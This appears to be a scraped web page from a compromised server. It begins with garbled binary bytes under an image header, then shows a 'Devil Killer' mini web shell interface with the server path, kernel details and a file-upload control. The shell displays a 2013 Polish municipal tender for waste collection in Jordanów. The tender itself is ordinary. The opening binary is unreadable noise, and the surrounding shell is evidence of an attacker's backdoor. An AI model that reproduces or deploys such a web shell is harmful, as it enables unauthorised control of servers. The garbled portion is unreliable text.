JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131108/457586-N-2013.html

<p class="kh_header"><b>Jordanów: Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych z terenu Miasta Jordanowa</b><br>
<b>Numer ogłoszenia: 457586 - 2013; data zamieszczenia: 08.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Jordanów z siedzibą Urzędu Miasta Jordanowa , Rynek 1, 34-240 Jordanów, woj. małopolskie, tel. 18 26 91 700, faks 18 26 91 719.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jordanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych z terenu Miasta Jordanowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie i zagospodarowanie (odzysk lub unieszkodliwienie)wskazanych w opisie zamówienia odpadów komunalnych z nieruchomości położonych na terenie Miasta Jordanowa, na których zamieszkują mieszkańcy, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U. z 2012 r. poz. 391), zapisami uchwały sejmiku Województwa Małopolskiego Nr XXV/397/12 z dnia 2 lipca 2012 r. - Planu Gospodarki Odpadami Województwa Małopolskiego oraz postanowieniami UCHWAŁY NR XXVIII/214/2013 RADY MIASTA JORDANOWA z dnia 26 września  2013 r. w sprawie Regulaminu utrzymania czystości i porządku na terenie Gminy Miasta Jordanów.
1)Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie:
a)Zgromadzonych w workach, pojemnikach i kontenerach usytuowanych przy zamieszkałych  budynkach mieszkalnych:
-zmieszanych nie segregowanych odpadów komunalnych o kodzie 20 03 01 
-segregowanych (gromadzonych w sposób selektywny) podanych poniżej rodzajów odpadów:
Odpadów ulegających biodegradacji o kodzie 20 02 01,
Papieru i tektury ( kod 20 01 01, 15 01 01),
Tworzyw sztucznych ( kody 20 01 39, 15 01 02),
Opakowań  wielomateriałowych ( kod 15 01 05),
Metalu ( kod 15 01 04, 20 01 40),
Tekstyliów (kod 20 01 11),
Szkła ( kod 20 01 02, 15 01 07),
Pieluch jednorazowych,
Popiołów.
b)Dostarczonych w określonych odrębnie terminach do punktu selektywnej zbiórki odpadów komunalnych:
- Odpadów niebezpiecznych powstających w gospodarstwach domowych (tj. chemikalia, zużyte baterie i akumulatory i inne) o kodach 20 01 13*, 20 01 14*, 20 01 15*, 20 01 17*, 20 01 19*, 20 01 21*, 20 01 27*, 20 01 29*, 20 01 33*,
- Przeterminowanych leków o kodzie 20 01 33,
- Zużytego  sprzętu elektrycznego i elektronicznego o kodach 20 01 23*, 20 01 35*, 20 01 36,
-Odpadów wielkogabarytowych o kodzie 20 03 07, 
-Opon o kodzie 16 01 03,
-Odpady komunalne niewymienione w innych grupach o kodzie 20 03 99,
- Odpadów budowlanych z remontów niewymagających zgłoszenia zamiaru prowadzenia robót lub uzyskania pozwolenia na budowę,
- innych niewymienionych odpadów komunalnych.
2)W ramach zagospodarowania odpadów podmiot odbierający odpady zobowiązany jest do przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej lub  zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu południowego zgodnie z uchwałą Nr XXV/397/12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego. W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, zobowiązany jest do ich przekazywania do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7 ustawy z dnia 27 kwietnia 2001 r. o odpadach. 
3)Właściciele nieruchomości zamieszkałych od których będą odbierane odpady, maja obowiązek  gromadzenia odpadów w następujących typach pojemników (urządzeń do gromadzenia odpadów) :
a)pojemniki na odpady o pojemności 80 l, 120 l, 240 l, 1100 l,
b)worki o pojemności 60 l, 80 l, 120 l,
c)pojemniki -dzwony- o pojemności 1500 l,
d)kontenery typu KP 7, w tym:
a.dla domów jednorodzinnych:
na bioodpady - worki o pojemności: 60 l, 80 l, 120 l lub pojemniki o pojemności: 80 l, 120 l,
na odpady pozostałe - worki o pojemności: 60 l, 80 l, 120 l lub pojemniki o pojemności: 80 l, 120 l,
szkło: 60 l, 80 l, 120 l,
papier i tektura, tworzywa sztuczne, odpady wielomateriałowe, metal, tekstylia: 60 l, 80 l, 120 l,
worki na pieluchy jednorazowe: 60 l, 80 l,
b.dla budynków wielomieszkaniowych:
pojemniki na bioodpady o pojemności 120 l, 240 l, 1100 l,
pojemniki na pozostałe odpady 120 l, 240 l, 1100 l,
pojemniki dzwony przeznaczone do selektywnej zbiórki opakowań ze szkła, papieru i tektury,tworzyw sztucznych, odpadów wielomateriałowych, metalu, tekstyliów o pojemności 1500 l,
pojemniki na pieluchy o pojemności 120 l.
4)1.Odpady komunalne, zbierane w sposób selektywny  przez  właścicieli nieruchomości zamieszkałych  będą  gromadzone w następujący sposób:
-do worków/pojemników o kolorach:
a.brązowym - odpady ulegające biodegradacji,
b.szarym - odpady pozostałe, niesegregowane,
c.żółtym - papier i tekturę, tworzywa sztuczne, odpady wielomateriałowe, metal, tekstylia,
d.zielonym - szkło (białe i kolorowe),
e.pomarańczowym - pieluchy jednorazowe.
 2.Odpady komunalne, zbierane w sposób nieselektywny  przez  właścicieli nieruchomości  zamieszkałych  będą  gromadzone w następujący sposób:
- do worków/pojemników w kolorze:
a.szarym - odpady pozostałe, niesegregowane,
5)W ramach zamówienia Wykonawca dostarcza bezpłatnie worki - dla zamieszkałych budynków jednorodzinnych - (lub pojemniki odpłatnie) właścicielom nieruchomości zamieszkałych. W celu rozprowadzania worków tworzy punkty dystrybucji (lub wykorzystuje istniejące placówki, sklepy, teren oczyszczalni ścieków-PSZOK itp.) w Jordanowie. Wykonawca tworzy te punkty dystrybucji po wcześniejszym uzgodnieniu z Zamawiającym (wymagana akceptacja Zamawiającego). Punkty dystrybucji worków muszą zostać uruchomione w terminie do  15.12.2013r. 
Dostarczane worki muszą spełniać wymagania Regulaminu utrzymania czystości 
i porządku na terenie Gminy Miasto Jordanów, ponadto czytelnie oznaczone literami drukowanymi jakiej frakcji odpadów dotyczą np.: SZKŁO i koloru (zabarwieniu) zgodnym z przyjętym regulaminem i w/w opisem. Dopuszcza się dodatkowe oznaczenie na workach nazwą Wykonawcy lub Gminy. Ponadto powinny być opisane  numerem identyfikacyjnym nadanym przez Gminę. 
W ramach zamówienia Wykonawca dostarcza bezpłatnie pojemniki do zbierania odpadów komunalnych  w nieruchomościach wielomieszkaniowych oraz zapewnia utrzymanie pojemników w odpowiednim stanie sanitarnym, porządkowym i technicznym. 
6)W celu realizacji przedmiotu zamówienia Wykonawca obowiązany jest posiadać bazę magazynowo-transportową oraz o odpowiednim stanie technicznym  wyposażenie umożliwiające odbieranie odpadów komunalnych od właścicieli nieruchomości - zgodnie ROZPORZĄDZENIEM MINISTRA ŚRODOWISKA z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z dnia 25 stycznia 2013 r. nr 0 poz. 122 ).
7)Zamawiający zaleca zapoznanie się z warunkami terenowymi związanymi z realizacją zamówienia  - zamawiający będzie wymagał,  aby na drogach będących w zarządzie zamawiającego i dojazdach do posesji był użyty właściwy tabor transportowy, nie powodujący niszczenia dróg (część dróg wąska, ze znacznym spadkiem podłużnym, ograniczonymi warunkami manewrowania).
8)Częstotliwość wywozu odpadów, według Regulaminu utrzymania czystości i porządku na terenie Gminy Miasta Jordanów:
a)Dla budynków jednorodzinnych wywóz odpadów komunalnych odbywa się w sposób zapewniający właściwy stan sanitarno-porządkowy nieruchomości, zgodnie z następującą częstotliwością:
a.worek lub pojemnik na odpady ulegające biodegradacji opróżniany nie rzadziej niż:
co 2 tygodnie w sezonie, tj. od 1 maja do 30 września,
co 3 tygodnie poza sezonem, tj. od 1 października do 30 kwietnia;
b.worek lub pojemnik na odpady pozostałe opróżniany nie rzadziej niż:
co 4 tygodnie;
c.worki na papier, tekturę, tworzywa sztuczne, odpady wielomateriałowe, metal i tekstylia odbierany nie rzadziej niż:
1 raz w miesiącu;
d.worki na szkło odbierane zależnie od zapełnienia razem z workami na papier, tekturę, tworzywa sztuczne, odpady wielomateriałowe, metal i tekstylia;
e.worki na pieluchy odbierane razem z workami na papier, tekturę, tworzywa sztuczne, odpady wielomateriałowe, metal i tekstylia lub z odpadami pozostałymi.
b)Dla budynków wielomieszkaniowych wywóz odpadów komunalnych odbywa się w sposób zapewniający właściwy stan sanitarno-porządkowy nieruchomości, zgodnie z następującą częstotliwością:
a.pojemnik na odpady ulegające biodegradacji opróżniany nie rzadziej niż 1 raz w tygodniu;
b.pojemnik na odpady pozostałe opróżniany nie rzadziej niż 1 raz w tygodniu;
c.pojemnik na papier, tekturę, tworzywa sztuczne, odpady wielomateriałowe, metal i tekstylia opróżniany nie rzadziej niż1 raz w tygodniu;
d.pojemnik na na szkło opróżniany nie rzadziej niż1 raz na dwa tygodnie;
e.pojemnik na pieluchy opróżniany nie rzadziej niż 1 raz w tygodniu.
c)Odbiór odpadów wielkogabarytowych, opon, zużytego sprzętu elektrycznego i elektronicznego, baterii i akumulatorów, odpadów problematycznych, odpadów z remontów oraz przeterminowanych leków będzie następował z ogólnodostępnego punktu selektywnej zbiórki odpadów komunalnych w momencie zapełnienia pojemników i kontenerów. 
9)Do obowiązku wykonawcy należy zorganizowanie i prowadzenie ogólnodostępnego punktu selektywnego zbierania odpadów  komunalnych. 
Ogólnodostępny punkt będzie zlokalizowany na terenie oczyszczalni ścieków w Jordanowie będzie  czynny minimum  dwa razy w tygodniu w godzinach uzgodnionych z Zamawiającym, po rozstrzygnięciu postępowania.
10)Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno - prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.
11)Odpady zebrane od właścicieli nieruchomości z terenu Gminy Miasto Jordanów Wykonawca zobowiązany jest zagospodarować (poddać odzyskowi lub unieszkodliwieniu zgodnie z obowiązującym prawem), w tym zmieszane odpady komunalne, odpady ulegające biodegradacji oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania przekazywać do regionalnych instalacji do przetwarzania odpadów komunalnych oraz przedstawienie Zamawiającemu jeden raz na miesiąc dowodów potwierdzających wykonanie tych czynności, tj. karty przekazania odpadów.
12)Wykonawca odpowiedzialny jest za osiąganie poziomów odzysku odpadów komunalnych z uwzględnieniem poziomów odzysku wskazanych w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U z 2012r., poz. 391), Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U z 2012r., poz. 645), oraz Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U z 2012r. poz. 676).
13)Wykonawca przed zakwalifikowaniem odpadów segregowanych do zmieszanych w wypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, sporządza na tą okoliczność dokumentację (np. oświadczenie, dokumentację fotograficzną) na poziomie umożliwiającym wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty. Dokumentację wraz z wykazem właścicieli nieprawidłowo segregujących odpady oraz fakturą miesięczną za wykonaną usługę przekaże Zamawiającemu.
14)Wykonawca zobowiązany jest do:
a)Ważenia wszystkich odebranych odpadów komunalnych w punkcie wagowym zlokalizowanym w miejscu przekazywania odpadów do składowania.
b)Przekazywania odpadów do uprawnionego przedsiębiorcy wykonującego działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych i uzyskania od niego potwierdzenia odbioru odpadów zebranych z terenu Miasta Jordanowa na karcie przekazania odpadów.
c)Terminowego zbierania i wywożenia odpadów.
d)Przeładowywania odpadów w legalnym i przystosowanym do tego miejscu.
e)Niezwłocznego zawiadomienia Zamawiającego o okolicznościach przeszkadzających w prawidłowym wykonaniu usługi.
f)Rozliczania się z wykonywanych usług poprzez przedstawienie wymaganych przepisami dokumentów.
g)Utrzymania w należytym stanie technicznym, sanitarnym i porządkowym narzędzi i urządzeń wykorzystywanych na potrzeby realizacji umowy.
h)W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie.
i)Wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi wszystkich wymogów wynikających z obowiązujących przepisów, dotyczących odbierania i zagospodarowania odpadów komunalnych.
15)Wykonawca jest zobowiązany do przekazania Zamawiającemu raportów zawierających informację o:
a)ilość odebranych odpadów w Mg, z podziałem na poszczególne frakcje odpadów. Wykonawca sporządza raport w formie pisemnej uzgodnionej z Zamawiającym - w formie określonej przez Zamawiającego. Wykonawca przesyła raport miesięczny w formie pisemnej do Zamawiającego wraz z fakturą - raport comiesięczny;
b)ilość odebranych odpadów wielkogabarytowych i innych odpadów, zużytego sprzętu elektrycznego i elektronicznego, zużytych opon, zebranych w PSZOK. Raport ze zbiórki odpadów wielkogabarytowych określa rodzaj frakcji odpadów i ilość danej frakcji w Mg. Wykonawca sporządza raport w formie pisemnej uzgodnionej z Zamawiającym. Wykonawca przesyła raport pisemny do Zamawiającego wraz z  fakturą za miesiąc, w którym przeprowadzono zbiórkę - raport comiesięczny ;
c)ilość odebranych odpadów budowlanych w trakcie indywidualnej zbiórki z danej nieruchomości realizowanej do podstawionych pojemników przez Wykonawcę. Raport ze zbiórki odpadów określa: adres nieruchomości, dane właściciela, datę odbioru odpadów, szczegółowy opis rodzaju odpadów budowlanych (np. gruz) i ilość w Mg lub m3. Wykonawca przesyła Raport pisemny do Zamawiającego wraz z fakturą za miesiąc, 
w którym przeprowadzono zbiórkę - raport comiesieczny;
d)Kartę przekazania odpadów sporządzonych zgodnie z obowiązującymi przepisami.
16)Wykonawca sporządza kwartalną informację o masie poszczególnych rodzajów odpadów (z podaniem kodów odpadów zgodnie z obowiązującą klasyfikacją), stanowiących pozostałość po przerobie odebranych zmieszanych odpadów komunalnych, kierowaną do składowania wraz z podaniem instalacji do której zostały one przekazane. Informacja ta ma być składana do końca miesiąca po upływie kwartału którego dotyczy, za wyjątkiem IV kwartału, za który informacja ma być złożona do 15 stycznia 2015r.
17)Wykonawca sporządza sprawozdanie kwartalne, o którym mowa w art. 9n ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U z 2012r., poz. 391 z późn. zm). Sprawozdanie sporządzone w sposób wymagany przez przepisy prawa Wykonawca przekazuje Burmistrzowi Miasta Jordanowa w terminie do końca miesiąca następującego po kwartale, którego dotyczy. 
18)Wykonawca przekazuje Zamawiającemu sprawozdania kwartalne z ilości i rodzajów przekazanych worków właścicielom nieruchomości zamieszkałych na terenie Gminy  Miasto Jordanów. Sprawozdanie to przekazywane jest w terminie do końca miesiąca następującego po kwartale, którego dotyczy.
19)Wykonawca przekazuje Zamawiającemu bieżące informacje o adresach nieruchomości na których zamieszkują mieszkańcy i powstają odpady komunalne, a nie ujętych w bazie danych prowadzonej przez Zamawiającego.
20)Wykonawca zobowiązuje się do przekazywania niezwłocznie Zamawiającemu informacji o adresach nieruchomości gdzie odpady komunalne zbierane są w sposób nieselektywny - niesegregowane zgodnie z regulaminem. Informację tą Wykonawca sporządza w formie pisemnej, określającej adres nieruchomości, opis stwierdzonych niezgodności w sposobie segregacji odpadów, osobę stwierdzającą osobiście niezgodność w imieniu Wykonawcy, dokumentację zdjęciową obrazującą stwierdzoną niezgodność w segregacji odpadów. Wykonawca przesyła tą informację do Zamawiającego w terminie 14 dni od zakończenia miesiąca, w którym stwierdzono nieprawidłowość.
21)Ilość odebranych odpadów w każdorazowej zbiórce Zamawiający będzie mógł sprawdzić poprzez zważenie na udostępnionej wadze na terenie Jordanowa - na koszt Wykonawcy.
SZCZEGÓŁOWE DANE CHARAKTERYZUJĄCE WIELKOŚĆ ZAMÓWIENIA
 liczba budynków jednorodzinnych (gospodarstw domowych) - ok.  1012;
 liczba budynków wielorodzinnych - 17;
 przewidywana roczna ilość odpadów odebranych od mieszkańców   - 1000 Mg / rok,  
- udział odpadów segregowanych w całkowitej ilości odpadów  stanowił w III kwartale 2013r.  ok. 32% 
- zebrane w okresie III kwartału 2013r.  odpady wielkogabarytowe stanowiły: około 29,80 Mg; 
- zebrane w jednorazowej akcji w 2012r. odpady elektroniczne i elektryczne stanowiły: około 1 Mg.
- szacunkowa ilość zapotrzebowania na worki  do gromadzenia odpadów :53 700szt., pojemniki 1100 l- 16 szt., pojemniki 240 l- 14 szt., pojemniki 120 l- 20 szt. ( ilość wyliczona na podstawie danych z III kwartału 2013)
Wykonawca zobowiązany jest do odebrania i zagospodarowania wszystkich odpadów wytworzonych na terenie Gminy Miasto Jordanów w nieruchomościach zamieszkałych, niezależnie od zmiany liczby budynków jednorodzinnych.
Zamawiający zapłaci umówione wynagrodzenie ryczałtowe za odbiór i zagospodarowanie 1000 Mg odpadów komunalnych za okres obowiązywania umowy w całym 2014 roku, bez względu na jakiekolwiek odstępstwa od zamiany ilości tj. zmniejszenie lub przekroczenia w/w ilości. Zamawiający nie przewiduje żadnej zmiany warunków umowy w zakresie wielkości zamówienia oraz należnego wynagrodzenia wykonawcy.  
WSPÓLNE OBOWIĄZKI ZAMAWIAJĄCEGO I WYKONAWCY 
1)Zamawiający i wykonawca poprowadzą wspólna kampanie informacyjną na terenie Miasta Jordanowa w zakresie odbioru i zagospodarowania odpadów.
2). Na 15 dni przed rozpoczęciem realizacji zamówienia Zamawiający dostarczy Wykonawcy szczegółowy wykaz adresów nieruchomości objętych umową odbioru odpadów oraz miejsc do gromadzenia odpadów.
3). Wykonawca i Zamawiający opracują wspólnie harmonogram odbioru odpadów dla nieruchomości zabudowanych z terenu Miasta Jordanowa, celem rozpropagowania i skutecznego przygotowania realizacji umowy.
4). Zamawiający na stronie internetowej Miasta będzie publikował wszelkie informacje związane z systemem gospodarki odpadami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający  wymaga wniesienia wadium  w wysokości 5000,00 zł  ( pięć tysięcy złotych) 
Termin wniesienia wadium upływa dnia: 				2013-11-18 o godz. 9:30
Wadium musi obejmować okres związania ofertą, tj. do dnia 	2013-12-17

Wadium może być wnoszone w jednej lub kilku następujących formach:
a) w pieniądzu - przelew na rachunek bankowy,  na nr rachunku bankowego: 	
                      Urząd Miasta Jordanowa BS JORDANÓW
                            nr konta 86 87990001 0000 0000 8859 0024;
b) w poręczeniach bankowych,
c) w gwarancjach bankowych,
d) w gwarancjach ubezpieczeniowych,
e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.  z  2000 r. Nr 109, poz. 1158, z późn. zm.)

 w kasie zamawiającego: Urząd Miasta Jordanowa, 34-240 Jordanów, Rynek 1, pok. nr 3.
Wadium należy wnieść z adnotacją: wadium Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych z terenu Miasta Jordanowa- RGK.G.271.1.11.2013
Oznacza to, że w terminie wniesienia wadium w kasie (dotyczy form określonych w punktach b-e) lub na koncie zamawiającego (farma określona w punkcie a) muszą znaleźć się wyżej wymienione formy wadium. 
2.Do oferty należy dołączyć kopię polecenia przelewu lub innej formy wadium.
3.Wykonawca, który nie zabezpieczy oferty wadium, zostanie wykluczony z ubiegania się o udzielenie zamówienia publicznego.
4. Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:
1)	posiadający uprawnienia do wykonywania określonej działalności objętych przedmiotem zamówienia. 
Warunek ten zostanie spełniony jeśli wykonawca wykaże że posiada uprawnienia do wykonywania określonej działalności lub czynności.
Zamawiający żąda:
a)	zezwolenia na prowadzenie działalności w zakresie transportu i zbierania odpadów, wydane przez właściwy organ zgodnie z ustawą o odpadach                           (z zastrzeżeniem art. 31 ust. 1, art. 32 ust.1,oraz art. 33 ust.1a i 4 ustawy o odpadach);
b)	oświadczenia o wpisie do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzonego przez Głównego Inspektora Ochrony Środowiska;
c)	oświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Miasto Jordanów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną  usługę, odpowiadające swoim rodzajem przedmiotowi niniejszego zamówienia i o wartości porównywalnej do wartości przedmiotu zamówienia.
